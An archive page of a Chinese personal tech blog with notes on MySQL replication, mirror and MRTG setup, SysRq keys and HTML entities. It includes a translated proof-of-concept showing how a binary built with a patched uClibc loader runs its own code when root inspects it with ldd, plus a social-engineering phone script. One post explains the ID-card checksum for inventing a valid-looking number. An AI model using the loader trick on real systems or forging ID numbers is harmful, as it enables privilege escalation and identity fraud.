I am LAZY bones? AN ancient AND boring SITE

分类: '备忘' 的归档

mysql主备部署笔记

本文说的mysql主备是指单向、异步的数据复制。可以是一个主、多个备。
这样做的好处显而易见:有利于健壮性、速度和系统管理。备用数据库可以做为只读查询和备份的机器,减轻主用数据库的负担。

实施前提:
主用数据库的配置里至少有:

[mysqld]
log-bin=mysql-bin
server-id=1

建议主备的数据库版本一致。

我所知道的最简单的实施方式(不需要停主库,甚至不需要长时间地禁止主库写入):

主库操作:
在主库里建一个复制用的用户:

grant replication slave on *.* TO 'replication'@'备库地址' identified by 'replication';

导出主库的数据,并记下当然日志文件和偏移:

mysqldump --master-data=2 --single-transaction -uroot -p --all-databases >dumpfile

这里是把数据以SQL的形式导出,并记下导出瞬间的日志文件和偏移(得益于--master-data=2参数),出来的dumpfile的前面会有一行类似以下的注释信息,就是文件名和偏移值了:

-- CHANGE MASTER TO MASTER_LOG_FILE='mysql-bin.000011', MASTER_LOG_POS=1061553673;

对于这步,网络上一般采用的方法为:

FLUSH TABLES WITH READ LOCK--先把主库设置成只读,然后导出SQL或者直接复制数据文件
SHOW MASTER STATUS; --记下日志文件和偏移
UNLOCK TABLES;  --恢复主库写入

这样,至少在复制数据的那段时间,主库是不可提供服务的。

备库操作:
复制主库的/etc/my.cnfdumpfile
把主库配置里的 server-id 改成2(或者3、4,多个备库保存互不相同),再加上

relay-log = slave-relay.log 
relay-log-index = slave-relay-log.index

导入数据:

 mysql <dumpfile

进入mysql命令行执行:

SLAVE STOP;
CHANGE MASTER TO
MASTER_HOST='主库地址',
MASTER_PORT=3306,
MASTER_USER='replication',
MASTER_PASSWORD='密码',
MASTER_LOG_FILE='mysql-bin.000011',
MASTER_LOG_POS=1061553673;
SLAVE START;

然后,就搞定了,可以在备库执行

SHOW PROCESSLIST;

查看同步的状态,如果此命令的输出里有两个“system user”的进程,并且Command都是“Connect”的话,就差不多OK了,此时,任何对主库的修改,都能准实时地从备库里查询出来。

参考文章:mysql官方中文手册

天朝第二代身份证号码的验证机制

今天,在盛大某网站注册的时候,身份证必填,但我又不想填真实身份证号码,于是随便编了串自认为合法的身份证号码,但是却马上被提示号码错误,由于响应速度极快,可以肯定不是联机校验正确性的,那也就是说第二代身份证除了大家都知道的几位表示生日和性别的规则以外,还有另外的自我校验规则。于是翻开页面源码查看,发现这段js没有被压缩,所以规则也很好懂。
就在这里给大家科普下,不知道是不是火星了,呵呵。
以下代码来自这里,版权归盛大。当然,你也可以在维基百科找到更详细的介绍和算法。

iW = new Array(7,9,10,5,8,4,2,1,6,3,7,9,10,5,8,4,2,1);
iSum = 0;
for( i=0;i<17;i++){
    iC = v_card.charAt(i) ;
    iVal = parseInt(iC);
    iSum += iVal * iW[i];
}
iJYM = iSum % 11;
var sJYM = '';
if(iJYM == 0) sJYM = "1";
else if(iJYM == 1) sJYM = "0";
else if(iJYM == 2) sJYM = "x";
else if(iJYM == 3) sJYM = "9";
else if(iJYM == 4) sJYM = "8";
else if(iJYM == 5) sJYM = "7";
else if(iJYM == 6) sJYM = "6";
else if(iJYM == 7) sJYM = "5";
else if(iJYM == 8) sJYM = "4";
else if(iJYM == 9) sJYM = "3";
else if(iJYM == 10) sJYM = "2";
var cCheck = v_card.charAt(17).toLowerCase();
if( cCheck != sJYM ){
    return false; //对不上就是假号码
}

[转] ldd 的一个安全问题

本文的英文原文来自这里,作者:Peteris Krumins;中文译文转自酷壳,译者:陈皓

我们知道“ldd”这个命令主要是被程序员或是管理员用来查看可执行文件所依赖的动态链接库的。是的,这就是这个命令的用处。可是,这个命令比你想像的要危险得多,也许很多黑客通过ldd的安全问题来攻击你的服务器。其实,ldd的安全问题存在很长的时间了,但居然没有被官方文档所记录来下,这听上去更加难以理解了。怎么?是不是听起来有点不可思议?下面,让我为你细细道来。

首先,我们先来了解一下,我们怎么来使用ldd的,请你看一下下面的几个命令:
(1)

$ ldd /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7eca000)
        /lib/ld-linux.so.2 (0xb801e000)

(2)

$ LD_TRACE_LOADED_OBJECTS=1 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        /lib/ld-linux.so.2 (0xb7f84000)

(3)

$ LD_TRACE_LOADED_OBJECTS=1 /lib/ld-linux.so.2 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7f7c000)
        /lib/ld-linux.so.2 (0xb80d0000)

第(1)个命令,我们运行了 `ldd` 于 `/bin/grep`。我们可以看到命令的输出是我们想要的,那就是 `/bin/grep` 所依赖的动态链接库。
第(2)个命令设置了一个叫 LD_TRACE_LOADED_OBJECTS 的环境变量,然后就好像在运行命令 `/bin/grep` (但其实并不是)。 其运行结果和ldd的输出是一样的!
第(3)个命令也是设置了环境变量 LD_TRACE_LOADED_OBJECTS ,然后调用了动态链接库 `ld-linux.so` 并把 `/bin/grep` 作为参数传给它。我们发现,其输出结果还是和前面两个一样的。

具体发生了什么?

对于第二个和第三个命令来说,好像是对 `ldd` 的一个包装或是一个隐式调用。对于第二个和第三个命令来说, `/bin/grep` 这个命令就根本没有被运行。这是一个GNU动态载入器的怪异的特性。如果其注意到环境变量LD_TRACE_LOADED_OBJECTS 被设置了,那么它就不会去执行那个可运行的程序,而去输出这个可执行程序所依赖的动态链接库 (在BSD 系统上的`ldd` 是一个C 程序)。
如果你使用的是Linux,那么,你可以去看看 `ldd` 程序,你会发现这是一个 bash 的脚本。如果你仔细查看这个脚本的源码,你会发现,第二个命令和第三个命令的差别就在于 `ld-linux.so` 装载器是否可以被`ldd`所装载,如果不能,那就是第二个命令,如果而的话,那就是第三个命令。
所以,如果我们可以让`ld-linux.so` 装载器失效的话,或是让别的装载器来取代这个系统默认的动态链接库的话,那么我们就可以让 `ldd`来载入并运行我们想要程序了——使用不同的载装器并且不处理LD_TRACE_LOADED_OBJECTS 环境变量,而是直接运行程序。
例如,你可以创建一个具有恶意的程序,如: ~/app/bin/exec 并且使用他自己的装载器 ~/app/lib/loader.so。如果某人(比如超级用户root) 运行了 `ldd /home/you/app/bin/exec` ,于是,他就玩完了。因为,那并不会列出所依赖的动态链接库,而是,直接执行你的那个恶意程序,这相当于,那个用户给了你他的授权。

编译一个新的装载器

下载 uClibc C库。这是一个相当漂亮的代码,并且可以非常容易地修改一下源代码,使其忽略 LD_TRACE_LOADED_OBJECTS 检查。

$ mkdir app
$ cd app
app$ wget 'http://www.uclibc.org/downloads/uClibc-0.9.30.1.tar.bz2'

解压这个包,并执行 `make menuconfig`,选项你的平台架构(比如:i386),剩下的事情保持不变。

$ bunzip2 < uClibc-0.9.30.1.tar.bz2 | tar -vx
$ rm -rf uClibc-0.9.30.1.tar.bz2
$ cd uClibc-0.9.30.1
$ make menuconfig

编辑 .config 并设置目标安装目录:到 `/home/you/app/uclibc`,

RUNTIME_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/"
DEVEL_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/usr/"

改成

RUNTIME_PREFIX="/home/you/app/uclibc/"
DEVEL_PREFIX="/home/you/app/uclibc/usr/"

(bones7456注: 其实上面这一步也可以在make menuconfig的界面里修改Library Installation Options。)
现在你需要改动一下其源代码,让其忽略LD_TRACE_LOADED_OBJECTS 环境变量的检查。下面是个这修改的diff,你需要修改的是 `ldso/ldso/ldso.c` 文件。你可把下面的这个diff存成一个叫file的文件,然后运行这个命令:`patch -p0 < file`。如果你不这样做的话,那么,我们的黑客程序就无法工作,而我们的这个装载器还是会认为 `ldd` 想列出动态链接库的文件列表。

--- ldso/ldso/ldso-orig.c       2009-10-25 00:27:12.000000000 +0300
+++ ldso/ldso/ldso.c    2009-10-25 00:27:22.000000000 +0300
@@ -404,9 +404,11 @@
         }  #endif
+    /*
         if (_dl_getenv("LD_TRACE_LOADED_OBJECTS", envp) != NULL) {
                 trace_loaded_objects++;
         }
+    */
   #ifndef __LDSO_LDD_SUPPORT__
         if (trace_loaded_objects) {

下面让我们来编译并安装它。

$ make
$ make install

(bones7456注:在我的gentoo系统里,make isntall的时候会出点小错,将extra/scripts/unifdef.c里所有的getline改成getline_就可以通过了。)

于是,我们的 uClibc 装载器就被安装了,并且libc 库指向了 /home/you/app/uclibc. 就这么简单,现在,我们需要做的就是把我们的uClibc的装载器 (app/lib/ld-uClibc.so.0)变成默认的。

小试牛刀

首先,先让我们来创建一个测试程序,这人程序也就是输出些自己的东西,这样可以让我们看到我们的程序被执行了。我们把这个程序放在 `app/bin/`下,叫“myapp.c”,下面是源代码

#include <stdio.h>
#include <stdlib.h>
 
int main() {
  if (getenv("LD_TRACE_LOADED_OBJECTS")) {
    printf("All your things are belong to me.\n");
  }
  else {
    printf("Nothing.\n");
  }
  return 0;
}

这是一个很简单的代码了,这段代码主要检查一下环境变量LD_TRACE_LOADED_OBJECTS 是否被设置了,如果是,那么恶意程序执行,如果没有,那么程序什么也不发生。

下面是编译程序的命令,大家可以看到,我们静态链接了一些函数库。我们并不想让LD_LIBRARY_PATH这个变量来发挥作用。

$ L=/home/you/app/uclibc
$ gcc -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 \
    -Wl,-rpath-link,$L/lib \
    -nostdlib \
    myapp.c -o myapp \
    $L/usr/lib/crt*.o \
    -L$L/usr/lib/ \
    -lc

下面是GCC的各个参数的解释:
* -Wl,–dynamic-linker,$L/lib/ld-uClibc.so.0 — 指定一个新的装载器。
* -Wl,-rpath-link,$L/lib — 指定一个首要的动态装载器所在的目录,这个目录用于查找动态库。
* -nostdlib — 不使用系统标准库。
* myapp.c -o myapp — 编译myapp.c 成可执行文件 myapp,
* $L/usr/lib/crt*.o — 静态链接runtime 代码
* -L$L/usr/lib/ — libc 的目录(静态链接)
* -lc — C 库

现在让我们来运行一下我们的 `myapp` (没有ldd,一切正常)

app/bin$ ./myapp
Nothing.

LD_TRACE_LOADED_OBJECTS 没有设置,所以输出 “Nothing.” 。
现在,让我们来使用 `ldd` 来看看这个程序的最大的影响力,让我们以root身份来干这个事。

$ su
Password:
# ldd ./myapp
All your things are belong to me.

哈哈,我们可以看到,ldd触发了我们的恶意代码。于是,我们偷了整个系统!

邪恶的程序

下面这个例子更为实际一些,如果没有`ldd` ,那程序程序会报错 “error while loading shared libraries” ,这个错误信息会引诱你去去使用 `ldd` 去做检查,如果你是root的话,那么就整个系统就玩完了。而当你可以了 `ldd` 后,它会在干完坏事后,模仿正确的`ldd`的输出,告诉你 `libat.so.0` 不存在。
下面的代码仅仅是向你展示了一下整个想法,代码还需加工和改善。

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
 
/*
This example pretends to have a fictitious library 'libat.so.0' missing.
When someone with root permissions runs `ldd this_program`, it does
something nasty in malicious() function.
 
I haven't implemented anything malicious but have written down some ideas
of what could be done.
 
This is, of course, a joke program. To make it look more real, you'd have
to bump its size, add some more dependencies, simulate trying to open the
missing library, detect if ran under debugger or strace and do absolutely
nothing suspicious, etc.
*/
 
void pretend_as_ldd()
{
    printf("\tlinux-gate.so.1 =>  (0xffffe000)\n");
    printf("\tlibat.so.0 => not found\n");
    printf("\tlibc.so.6 => /lib/libc.so.6 (0xb7ec3000)\n");
    printf("\t/lib/ld-linux.so.2 (0xb8017000)\n");
}
 
void malicious()
{
    if (geteuid() == 0) {
        /* we are root ... */
        printf("poof, all your box are belong to us\n");
 
        /* silently add a new user to /etc/passwd, */
        /* or create a suid=0 program that you can later execute, */
        /* or do something really nasty */
    }
}
 
int main(int argc, char **argv)
{
    if (getenv("LD_TRACE_LOADED_OBJECTS")) {
        malicious();
        pretend_as_ldd();
        return 0;
    }
 
    printf("%s: error while loading shared libraries: libat.so.0: "
           "cannot open shared object file: No such file or directory\n",
           argv[0]);
    return 127;
}

邪恶的电话

事实上来说,上面的那段程序可以影响更具破坏性,因为大多数的系统管理员可能并不知道不能使用 `ldd` 去测试那些不熟悉的执行文件。下面是一段很可能会发现的对话,让我们看看我们的程序是如何更快地获得系统管理员的权限的。

系统管理员的电话狂响……
系统管理员: “同志你好,我是系统管理员,有什么可以帮你的?”
黑客:“管理员同志你好。我有一个程序不能运行,总是报错,错误我也看不懂,你能不能帮我看看?”
系统管理员:“没问题,你的那个程序在哪里?”
黑客: “在我的home目录下,/home/you/app/bin/myapp”。
系统管理员:“ OK,等一些”,黑客在电话这头可以听到一些键盘的敲击声。
系统管理员:“好像是动态链接库的问题,你能告诉我你的程序具体需要什么样的动态链接库吗?”
黑客说: “谢谢,应该没有别的嘛。”
系统管理员:“嗯,查到了,说是没有了 `libat.so.0`这是你自己的动态链接库吗?”
黑客说:“哦,好像是的,你等一下,我看看……” 黑客在那头露出了邪恶的笑,并且,讯速地输入了下面的命令:
`mv ~/.hidden/working_app ~/app/bin/myapp`
`mv ~/.hidden/libat.so.0 ~/app/bin/`
黑客说:“哦,对了,的确是我的不对,我忘了把这个链接库拷过来了,现在应该可以了,谢谢你啊,真是不好意思,麻烦你了”
系统管理员: “没事就行了,下次注意啊!”(然后系统管理心里暗骂,TMD,又一个白痴用户!……)

教训一:千万不要使用 `ldd` 去测试你不知道的文件!
教训二:千万不要相信陌生人!

ubuntu下,给现有网站加个简单的流量监控的方法

这里假设你已经用LAMP或者其他东西建立好了一个网站,并可以正常访问了。比如我的ubuntu源
在这样的基础上,如果你要给你的站加一个流量监控的功能的话。可以选择最基础的mrtg
mrtg是一个基于snmp的web监控软件,可以生成系统信息的图表结果,这个“系统信息”其实不仅包括网络流量,还可以是CPU/负载/内存等其他信息。如果你想监控更多信息,可以参考这个页面
我这里只以我需要的网络流量为例。
安装必要的包:

sudo apt-get install snmpd mrtg

再修改snmpd的配置,编辑 /etc/snmp/snmpd.conf ,找到以下几行,改成这样:

#       sec.name  source          community
#com2sec paranoid  default         public   #注释掉这行
com2sec readonly  default         public    #再把这行打开
#com2sec readwrite default         private

这样,其他进程就可以通过snmp读取相关信息了。记得修改完配置需要

sudo /etc/init.d/snmpd restart

重启一下snmpd。

接下来要修改mrtg的配置了。mrtg的配置文件是 /etc/mrtg.cfg ,他的格式比较复杂。所以mrtg提供了专门的命令行工具──cfgmaker──来生成它的配置文件,你只需要通过给cfgmaker传入特定的参数,即可生成相应的配置。
还是以我的简单应用为例:

cfgmaker --global "WorkDir: /data/mirrors/mrtg" public@localhost | sudo tee /etc/mrtg.cfg

这样就把生成的配置文件写入了 /etc/mrtg.cfg,你也可以再打开确认一下是否符合你的要求。
下一步是生成mrtg的index.html文件,方法如下:

sudo indexmaker /etc/mrtg.cfg | sudo tee /data/mirrors/mrtg/index.html

注意了,这个index.html文件只需要手工生成一次,以后就都是静态的了,除非你修改过 /etc/mrtg.cfg 就不用再次生成了。但是这个html文件会引用其他的图片之类的,就需要重新生成了,默认ubuntu的mrtg已经把这个任务加进crontab了,5分钟执行一次,所以稍等片刻,你就可以访问了。
我配置的mrtg访问地址是http://ubuntu.srt.cn/mrtg/

另外也参考其他类似的流量统计软件 awstats

架设ubuntu源时的两个脚本

最近在折腾新的ubuntu的源,向公司申请了一台配置一般的服务器,另外买了一块硬盘,硬件就有了。
然后装了个ubuntu 9.04 server,装上ssh,再装上nginx,稍微配置一下,服务就好了,这个过程还是蛮简单的,也很顺利,就不多说了。
接下来就可以开始同步数据了。由于我的目标是一个完整的源,所以就没有用apt-mirror之类的工具,而是直接拿rsync抓取上游的数据了。这个数据量是很大的,所以想尽量选择一个速度最快的带rsync的而且是“Up to date”的源,但是在茫茫的ubuntu官方源列表里,这么多源哪个最快呢?当然没有人会告诉你答案,因为每个人的网络环境都不一样啊。所以,最好的办法还是实地测试,所谓磨刀不误砍柴功啊,后面有300多G的数据要下载呢,这个测试绝对有价值。
上脚本(2009-12-12 更新):

#!/bin/bash
 
rmie(){
while [ -n "$1" ] ; do
        [ -f $1 ] && rm $1
        shift
done
}
 
urls=`curl https://launchpad.net/ubuntu/+archivemirrors | \
tr -d "\n" | sed  's/<\/tr>/\n/g' | grep "Up to date"|grep '>rsync</a>'|awk -F '"' '{print $4}'`
rmie res
{
echo "$urls" | while read url;do 
echo "testing... $url"
rmie T
wget -q --no-cache -O T "$url/ls-lR.gz" &
sleep 5
kill %% 
echo -n "$url " >> res
ls -l T >>res
done
} 2>/dev/null
 
sort -k 6 -n res > fast_mirror_`date +%F`
rmie res T

最后你可以 tail fast_mirror_XXX 看到5秒内下载的字节数最多的一个源。我这还真有一个源,能在3秒把7.4M大的ls-lR.gz给下载完的。
然后,你可以先用这个最快的源把大部分数据先更新下来,完了之后,为了保证数据最新,再向官方源更新一次,我用的是这个脚本:

#!/bin/bash
[[ $UID == 0 ]] || { echo "Must be root to run this script."; exit 0; }
LOCK="/data/sync_sh/lock"
LOG="/data/sync_sh/log"
 
while true; do
echo -e "\nstart sync @ `date`" | tee -a $LOG
 
if [ -f $LOCK ]; then
	echo "another sync is running, I exiting..." | tee -a $LOG
	exit 1
fi
touch $LOCK
 
st=`date +%s`
rsync --timeout=120 --exclude=".~tmp~" -avP --delete-excluded --progress rsync://archive.ubuntu.com/ubuntu/pool/ /data/mirrors/ubuntu/pool/
res=$?
if [ $res -eq 0 ]; then
	echo "rsync pool succ" | tee -a $LOG
	et=`date +%s`
	echo "pool sync use $(( $et-$st )) sec = $(( ($et-$st)/60 )):$(( ($et-$st)%60 ))" | tee -a $LOG
else
	echo "rsync pool failed" $res | tee -a $LOG
fi
 
st=`date +%s`
rsync --timeout=120 --exclude=".~tmp~" -avP --delete-excluded --progress rsync://archive.ubuntu.com/ubuntu/ /data/mirrors/ubuntu/
res=$?
if [ $res -eq 0 ]; then
        echo "rsync all succ" | tee -a $LOG
        et=`date +%s`
        echo "all sync use $(( $et-$st )) sec = $(( ($et-$st)/60 )):$(( ($et-$st)%60 ))" | tee -a $LOG
else
        echo "rsync all failed" $res | tee -a $LOG
fi
 
df | grep "/data" | tee -a $LOG
echo -e "end sync @ `date`" | tee -a $LOG
 
rm $LOCK
 
sleep 7200
done

这个脚本先更新pool目录,再整个目录更新一遍,这样是为了减少出现软件列表里已经有某软件,但是却下载不到的情况。
脚本常驻运行,在上次更新完以后的2小时,启动下一次更新,这样应该算是国内最新的源了吧?
PS: 感谢服务器达人lupa的walkerxk在我架设源时,给我的热心帮助。

意外地发现一个CHM阅读器

很久以前,我用firefox的插件──CHM reader──来看chm文件,然后,不知道从哪个ff版本开始,就失效了,打开任何chm都没有反映。
后来,我又用chmsee看,但是这个却只依赖 net-libs/xulrunner-1.9.1 ,自从xulrunner升级了以后,chmsee打开任何chm文件都会出现段错误,也被我卸载了。
今天,ob在装virtualbox,问了我一句“现在vbox怎么不依赖Qt了啊?难道都内嵌了?”。其实我本来是知道 virtualbox-bin 是内嵌了Qt运行库的,但是为了保险起见,我还是 equery files virtualbox-bin 了一下,结果却意外地发现了这个:
/opt/VirtualBox/kchmviewer
看文件名,就知道是什么了,哈哈,原来vbox的帮助文件是chm格式的,所以顺便内置了一个chm阅读器。
试了试,这个阅读器完全可以独立运行,效果还不错呢,见我截图:
kchmviewer
节省版面,点击看大图吧。

linux的Magic Key

自从我换成了开源的A卡驱动以后,我的电脑就时不时地崩溃。现象是:突然之间,整个画面就冻结了,鼠标也不能动了,几乎所有的按键也都失效了,ctrl+alt+F1 和 ctrl+alt+backspace 都无效。这种情况一般发生在有不规则形状的窗口出现的时候,比如gnome-osd的透明文字,但也不是很一定的,发生的概率也不高,一般几天才会有一次。我想,要彻底解决的话,也只能等待驱动的改进了。
不过,每次崩溃都强行按电源的话,还是有点心痛的。幸好办法还是有的,因为驱动程序其实也只是一个程序而已,这时候即使驱动死掉了,鼠标键盘不能动,linux内核还是在正常运行的(按理如果我开了sshd的话,其他机器还是能ssh上来的)。而且,内核还是能处理一些键盘事件的,比如本文要说的:Magic System Request Key
以下按键,一般情况下不建议使用,除非是ctrl+alt+F1都失效了,才用。
使用Magic SysRq key的前提是CONFIG_MAGIC_SYSRQ这个内核选项被打开,并且没有在/proc/sys/kernel/sysrq里禁用掉,也就是 cat 这个文件的时候,出来的是 1 (或其他某些非0值)。其实这两个条件,在一般的linux发行版里都是满足的。下面就来介绍一下几个键的具体作用,其中SysRq指的是右上角的“Print Screen”键。

ALT-SysRq-b 立即重启系统,不卸载分区和同步文件。
ALT-SysRq-c 调用kexec内核函数来重启,可以生成个crashdump。
ALT-SysRq-d 显示所有的“锁”,如果开了X的话,估计基本看不到。
ALT-SysRq-e 给除了init以外的所有进程发送SIGTERM信号,可以试图正常结束所有进程。
ALT-SysRq-f 调用oom_kill函数来干掉占用了很大内存的进程。
ALT-SysRq-g 内核调试相关的(好像新内核已经没了?)。
ALT-SysRq-h 显示其他key的帮助,同样,如果开了X的话,估计基本看不到。
ALT-SysRq-i 给除了init以外的所有进程发送SIGKILL信号。
ALT-SysRq-k 结束当前虚拟终端的所有进程。
ALT-SysRq-l 显示所有活动CPU的栈跟踪信息。
ALT-SysRq-m 显示内存状态。
ALT-SysRq-n
ALT-SysRq-o 可能的话,关机。
ALT-SysRq-p 显示当前的寄存器状态和标志位。
ALT-SysRq-r 关闭键盘的raw模式。
ALT-SysRq-s 同步内存里的数据到硬盘。
ALT-SysRq-t 显示当前的任务信息。
ALT-SysRq-u 以只读模式重新挂载所有分区。
ALT-SysRq-v
ALT-SysRq-w 显示不可中断的任务
ALT-SysRq-x
ALT-SysRq-z
ALT-SysRq-数字键 调整日志输出级别
另外,除了物理的按键以外,其实还可以把某个键的值用root权限写到 /proc/sysrq-trigger 文件里(这个文件是个只写不读的怪文件,哈哈),比如

echo t > /proc/sysrq-trigger

,来触发Magic SysRq key。

以上内容可以在内核源码的 Documentation/sysrq.txt 里找到英文原文,但是即便是这个官方文档,也似乎不是每个按键都有效的,可能是某些只有在特定的硬件条件下才有效,又或者文档没更新?
在万一遇到程序崩溃的时候,你可能需要按的键是: ALT-SysRq-r e i s u b 来安全地重启机器~

使用twip架设Twitter API proxy

twipyegle的作品,是一个基于php的Twitter API proxy.配置非常简单,也很好用.
我架的proxy地址是http://li2z.cn/t/(已不可用),要使用的话,把你的客户端的Twitter API proxy指向这里就可以了.以我用的twitterfox为例:

vim ~/.mozilla/firefox/*/extensions/twitternotifier@naan.net/components/nsTwitterFox.js

然后,把第38行左右的行改成:

var TWITTER_API_URL = "http://li2z.cn/t/";

再重启一下firefox就可以了.
如果你也有自己的域名和空间(估计要国外的才行),你可以按照原作者的文章架设一个,如果没有并且相信我不会偷你密码的话,也欢迎使用 http://li2z.cn/t/ 让及.艾服.达不留的人忙到手抽筋为止吧~嘿嘿…

PS: 欢迎follow我: @bones7456

HTML的entity reference Character列表

所谓 entity reference Character 就是html里类似 &xxxx; 这样的字符,浏览器会把这样的字符给替换成奇奇怪怪的符号.
另外 charref 是指 &#nnnn; 这样的,直接把unicode码写在源码里的字符
昨天给gmbox增加entity reference支持的时候,发现在网上很难找到完整的一个列表,于是问TX.然后TX今天就给我了一个PDF文档,我用脚本稍微整理了一下,如下表,每个格子是一个字符,给出原字符+源码形式+unicode,或许在写HTML代码或者解析HTML代码的时候会用到.另外还提供方便用于源码的txt文件.

À
&Agrave;
192
Á
&Aacute;
193
Â
&Acirc;
194
Ã
&Atilde;
195
Ä
&Auml;
196
Å
&Aring;
197
Æ
&AElig;
198
Ç
&Ccedil;
199
È
&Egrave;
200
É
&Eacute;
201
Ê
&Ecirc;
202
Ë
&Euml;
203
Ì
&Igrave;
204
Í
&Iacute;
205
Î
&Icirc;
206
Ï
&Iuml;
207
Ð
&ETH;
208
Ñ
&Ntilde;
209
Ò
&Ograve;
210
Ó
&Oacute;
211
Ô
&Ocirc;
212
Õ
&Otilde;
213
Ö
&Ouml;
214
Ø
&Oslash;
216
Œ
&OElig;
338
Š
&Scaron;
352
Ù
&Ugrave;
217
Ú
&Uacute;
218
Û
&Ucirc;
219
Ü
&Uuml;
220
Ý
&Yacute;
221
Ÿ
&Yuml;
376
Þ
&THORN;
222
ß
&szlig;
223
à
&agrave;
224
á
&aacute;
225
â
&acirc;
226
ã
&atilde;
227
ä
&auml;
228
å
&aring;
229
æ
&aelig;
230
ç
&ccedil;
231
è
&egrave;
232
é
&eacute;
233
ê
&ecirc;
234
ë
&euml;
235
ì
&igrave;
236
í
&iacute;
237
î
&icirc;
238
ï
&iuml;
239
ð
&eth;
240
ñ
&ntilde;
241
ò
&ograve;
242
ó
&oacute;
243
ô
&ocirc;
244
õ
&otilde;
245
ö
&ouml;
246
ø
&oslash;
248
œ
&oelig;
339
š
&scaron;
353
ù
&ugrave;
249
ú
&uacute;
250
û
&ucirc;
251
ü
&uuml;
252
ý
&yacute;
253
ÿ
&yuml;
255
þ
&thorn;
254
Α
&Alpha;
913
Β
&Beta;
914
Γ
&Gamma;
915
Δ
&Delta;
916
Ε
&Epsilon;
917
Ζ
&Zeta;
918
Η
&Eta;
919
Θ
&Theta;
920
Ι
&Iota;
921
Κ
&Kappa;
922
Λ
&Lambda;
923
Μ
&Mu;
924
Ν
&Nu;
925
Ξ
&Xi;
926
Ο
&Omicron;
927
Π
&Pi;
928
Ρ
&Rho;
929
Σ
&Sigma;
931
Τ
&Tau;
932
Υ
&Upsilon;
933
Φ
&Phi;
934
Χ
&Chi;
935
Ψ
&Psi;
936
Ω
&Omega;
937
α
&alpha;
945
β
&beta;
946
γ
&gamma;
947
δ
&delta;
948
ε
&epsilon;
949
ζ
&zeta;
950
η
&eta;
951
θ
&theta;
952
ι
&iota;
953
κ
&kappa;
954
λ
&lambda;
955
μ
&mu;
956
ν
&nu;
957
ξ
&xi;
958
ο
&omicron;
959
π
&pi;
960
ρ
&rho;
961
ς
&sigmaf;
962
σ
&sigma;
963
τ
&tau;
964
υ
&upsilon;
965
φ
&phi;
966
χ
&chi;
967
ψ
&psi;
968
ω
&omega;
969
ϒ
&upsih;
978
ϖ
&piv;
982
ϑ
&thetasym;
977
¦
&brvbar;
166
¡
&iexcl;
161
¿
&iquest;
191
&
&amp;
38
"
&quot;
34

&lsquo;
8216

&rsquo;
8217

&sbquo;
8218

&ldquo;
8220

&rdquo;
8221

&bdquo;
8222

&lsaquo;
8249

&rsaquo;
8250
«
&laquo;
171
»
&raquo;
187

&hellip;
8230
·
&middot;
183
º
&ordm;
186
ª
&ordf;
170

&dagger;
8224

&Dagger;
8225

&permil;
8240
´
&acute;
180
ˆ
&circ;
710
˜
&tilde;
732
¨
&uml;
168
¸
&cedil;
184
¯
&macr;
175

&oline;
8254

&ndash;
8211

&mdash;
8212

&bull;
8226
§
&sect;
167

&para;
182
©
&copy;
169
®
&reg;
174

&trade;
8482

&minus;
8722
±
&plusmn;
177
×
&times;
215
÷
&divide;
247

&ne;
8800

&equiv;
8801

&sim;
8764

&cong;
8773

&asymp;
8776
<
&lt;
60

&le;
8804
>
&gt;
62

&ge;
8805

&lowast;
8727
¬
&not;
172
°
&deg;
176
²
&sup2;
178
³
&sup3;
179

&prime;
8242

&Prime;
8243

&frasl;
8260
¼
&frac14;
188
½
&frac12;
189
¾
&frac34;
190

&radic;
8730

&forall;
8704

&exist;
8707

&empty;
8709

&nabla;
8711

&isin;
8712

&notin;
8713

&ni;
8715

&prop;
8733

&ang;
8736

&and;
8743

&or;
8744

&cap;
8745

&cup;
8746

&sub;
8834

&sup;
8835

&nsub;
8836

&sube;
8838

&supe;
8839

&oplus;
8853

&otimes;
8855

&perp;
8869

&sdot;
8901

&lceil;
8968

&rceil;
8969

&lfloor;
8970

&rfloor;
8971

&lang;
9001

&rang;
9002

&there4;
8756

&infin;
8734
ƒ
&fnof;
402

&part;
8706

&int;
8747

&prod;
8719

&sum;
8721
µ
&micro;
181

&weierp;
8472

&image;
8465

&real;
8476

&alefsym;
8501
¢
&cent;
162
£
&pound;
163
¤
&curren;
164
¥
&yen;
165

&euro;
8364

&crarr;
8629

&larr;
8592

&uarr;
8593

&rarr;
8594

&darr;
8595

&harr;
8596

&lArr;
8656

&uArr;
8657

&rArr;
8658

&dArr;
8659

&hArr;
8660

&spades;
9824

&clubs;
9827

&hearts;
9829

&diams;
9830

&loz;
9674
 
&nbsp;
160

&ensp;
8194

&emsp;
8195

&thinsp;
8201

&zwnj;
8204

&zwj;
8205

font-face真好玩

firefox从3.5版本开始,已经支持font-face属性了.
这个属性是干吗用的呢?简单地说就是可以在客户端没有安装某个字体的时候,也显示出网页设计者指定的字体.
实现的过程,大概就是先在CSS里指定某个字体文件的路径,然后在浏览器打开页面的时候,临时下载此字体,再进行渲染.
如果你现在用的正是firefox3.5,那么你看到的本blog标题应该是这个样子的:
I_am_lazy_bones
如果看不到的话,赶紧升级浏览器去吧~
CSS的写法可以参照这里,我就不重复了.
另外,我用的字体来自UrbanFonts.com,这里有很多Free Fonts可用哦~
可以预见,以后肯定有越来越多的浏览器会支持此个性化的属性,以后的web也必将更加多姿多彩~